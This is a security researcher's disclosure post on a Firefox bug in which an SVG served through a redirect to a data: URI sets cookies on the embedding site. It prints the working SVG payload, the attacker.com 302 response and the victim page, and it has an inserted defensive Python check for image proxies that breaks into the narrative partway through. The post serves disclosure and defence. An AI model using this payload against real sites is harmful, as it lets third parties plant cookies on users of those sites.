Firefox SVG cross domain cookie vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Firefox SVG cross domain cookie vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>
<p>I recently read that browsers allow the use of meta tags to set cookies. I am not sure if I just forgot about this feature or never used it before. As I played with SVG in the past, I decided to give it a try. The SVG standard does not include the meta tag, but it supports the foreignObject tag:</p>
<blockquote><p>The &lt;foreignObject&gt; SVG element allows for inclusion of a foreign XML namespace which has its graphical content drawn by a different user agent.</p></blockquote>
<p>A simple example taken from MDN shows how to use the XHTML namespace inside an SVG file:</p>
<pre><code>&lt;foreignObject width="100" height="50" requiredExtensions="http://www.w3.org/1999/xhtml"&gt;
  &lt;!-- XHTML content goes here --&gt;
  &lt;body xmlns="http://www.w3.org/1999/xhtml"&gt;
    &lt;p&gt;Here is a paragraph that requires word wrap&lt;/p&gt;
  &lt;/body&gt;
&lt;/foreignObject&gt;
</code></pre>
<h2>Setting the cookie</h2>
<p>I adapted the example and pointed the browser to the following SVG:</p>
<pre><code>&lt;svg xmlns='http://www.w3.org/2000/svg'&gt;
  &lt;circle r='100'&gt;&lt;/circle&gt;
  &lt;foreignObject&gt;
    &lt;html xmlns='http://www.w3.org/1999/xhtml'&gt;
      &lt;meta http-equiv='Set-Cookie' content='ppp=qqq' /&gt;
    &lt;/html&gt;
  &lt;/foreignObject&gt;
&lt;/svg&gt;
</code></pre>
<p>The hosting domain now has a cookie ppp=qqq. The next step was to try what happens if another domain loads this SVG file:</p>
<pre><code>// Domain: http://example.com
&lt;!DOCTYPE html&gt;
&lt;body&gt;
  &lt;img src="http://attacker.com/cookie.svg"&gt;
&lt;/body&gt;
</code></pre>
<p>Sadly, the cookie was set for attacker.com, not for example.com.</p>
<h2>Redirects + data URIs</h2>
<p>The final trick to make things work was to use the data: protocol handler and redirects.</p>
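<p>For a defender, the two things worth recognising in this post are an SVG that carries a cookie-setting XHTML meta tag inside a foreignObject, and an image URL that answers with a 3xx redirect to a data: URI (the trick detailed in the next section). The Python below is an added example, mine and not code from the post, from Cure53 or from Mozilla; it sketches the checks a server-side image proxy (a service that fetches user-supplied image URLs on behalf of a page) can apply to both patterns. The URLs, response table and helper names are constructed for the example and assume nothing beyond what the post shows.</p>

```python
"""Added example, not code from the original post, Cure53 or Mozilla: checks a
server-side image proxy can apply to the two patterns the post describes.

  scan_svg_for_cookie_meta: find <meta http-equiv="Set-Cookie"> nested inside
                            <foreignObject> in an SVG document.
  safe_redirect_target:     refuse a 3xx Location that does not resolve to an
                            http(s) URL, e.g. the data: redirect in the post.
  fetch_image:              follow a bounded redirect chain through a table of
                            constructed responses and apply both checks.

All URLs and responses below are constructed for the example.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlsplit

SVG_NS = "http://www.w3.org/2000/svg"
ALLOWED_SCHEMES = {"http", "https"}
MAX_HOPS = 5


def _local_name(tag):
    # "{namespace}name" -> "name"
    return tag.rsplit("}", 1)[-1].lower()


def scan_svg_for_cookie_meta(svg_text):
    """Return the content values of Set-Cookie meta tags found inside any
    <foreignObject>. The meta local name is matched regardless of namespace,
    so a payload that omits the XHTML xmlns is still reported.
    Malformed XML raises ET.ParseError; a proxy should reject on that too."""
    root = ET.fromstring(svg_text)
    found = []
    for elem in root.iter():
        if elem.tag != f"{{{SVG_NS}}}foreignObject":
            continue
        for child in elem.iter():
            if _local_name(child.tag) == "meta" and \
               child.get("http-equiv", "").strip().lower() == "set-cookie":
                found.append(child.get("content", ""))
    return found


def safe_redirect_target(request_url, location):
    """Resolve Location against the URL that returned it and return the
    absolute target, or None if the scheme is not http(s) or the host is empty.
    A data: (or javascript:, file:, ...) Location therefore comes back as None."""
    target = urljoin(request_url, location.strip())
    parts = urlsplit(target)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return target


def fetch_image(url, responses, max_hops=MAX_HOPS):
    """Walk a redirect chain using `responses` (url -> (status, headers, body))
    as a stand-in for real HTTP. Returns (verdict, detail)."""
    for _ in range(max_hops + 1):
        if url not in responses:
            return ("reject", f"no response for {url}")
        status, headers, body = responses[url]
        if 300 <= status < 400:
            nxt = safe_redirect_target(url, headers.get("Location", ""))
            if nxt is None:
                return ("reject", "redirect to non-http(s) target")
            url = nxt
            continue
        if status != 200:
            return ("reject", f"status {status}")
        ctype = headers.get("Content-Type", "").lower()
        # Sniff as well as trust the header: an SVG served as image/png is still SVG.
        if "svg" in ctype or body.lstrip().startswith("<"):
            try:
                cookies = scan_svg_for_cookie_meta(body)
            except ET.ParseError:
                return ("reject", "unparseable SVG")
            if cookies:
                return ("reject", f"cookie-setting meta in foreignObject: {cookies}")
        return ("ok", url)
    return ("reject", "too many redirects")


# Constructed sample data: the post's payload, the MDN-style benign foreignObject,
# a relative redirect that must still be followed, and a redirect loop.
COOKIE_SVG = ("<svg xmlns='http://www.w3.org/2000/svg'><circle r='100'></circle>"
              "<foreignObject><html xmlns='http://www.w3.org/1999/xhtml'>"
              "<meta http-equiv='Set-Cookie' content='ppp=qqq' /></html>"
              "</foreignObject></svg>")
BENIGN_SVG = ("<svg xmlns='http://www.w3.org/2000/svg'>"
              "<foreignObject width='100' height='50'>"
              "<body xmlns='http://www.w3.org/1999/xhtml'><p>word wrap</p></body>"
              "</foreignObject></svg>")

RESPONSES = {
    "http://attacker.com/cookie": (302, {"Location": "data:image/svg+xml," + COOKIE_SVG}, ""),
    "http://attacker.com/cookie.svg": (200, {"Content-Type": "image/svg+xml"}, COOKIE_SVG),
    "http://cdn.example/old-logo.svg": (301, {"Location": "/logo.svg"}, ""),
    "http://cdn.example/logo.svg": (200, {"Content-Type": "image/svg+xml"}, BENIGN_SVG),
    "http://loop.example/a": (302, {"Location": "/a"}, ""),
}

if __name__ == "__main__":
    for u in RESPONSES:
        print(u, "->", fetch_image(u, RESPONSES))
```

<p>The benign MDN-style foreignObject passes, so the check does not have to ban foreignObject outright; it is the Set-Cookie meta inside it that is reported. Refusing any Location that is not http(s) is the part that matters for the redirect variant: once the proxy follows the 302 itself, the browser only ever sees the proxy's own origin.</p>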
<p>Assume the following code on the domain example.com:</p>
<pre><code>&lt;!DOCTYPE html&gt;
&lt;body&gt;
  &lt;img src="http://attacker.com/cookie"&gt;
&lt;/body&gt;
</code></pre>
<p>The web server at attacker.com answers with the following response:</p>
<pre><code>HTTP 302 Found
Location: data:image/svg+xml,&lt;svg xmlns='http://www.w3.org/2000/svg'&gt;&lt;circle r='100'&gt;&lt;/circle&gt;&lt;foreignObject&gt;&lt;html xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;meta http-equiv='Set-Cookie' content='ppp=qqq' /&gt;&lt;/html&gt;&lt;/foreignObject&gt;&lt;/svg&gt;
</code></pre>
<p>As soon as I opened this test case in Firefox, a cookie was set for example.com. This can introduce a lot of different vulnerabilities for web pages which allow the inclusion of images from external/third-party sites.</p>
<p>Another issue popped up during the investigation of the issue by the Firefox team, which can be read here as soon as it is public: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1317641#c20">https://bugzilla.mozilla.org/show_bug.cgi?id=1317641#c20</a></p>
<p>The bug bounty decision is still in progress. I have to thank my Cure53 mates, who helped playing with this vulnerability (especially Masato) :)</p>
</BODY></HTML>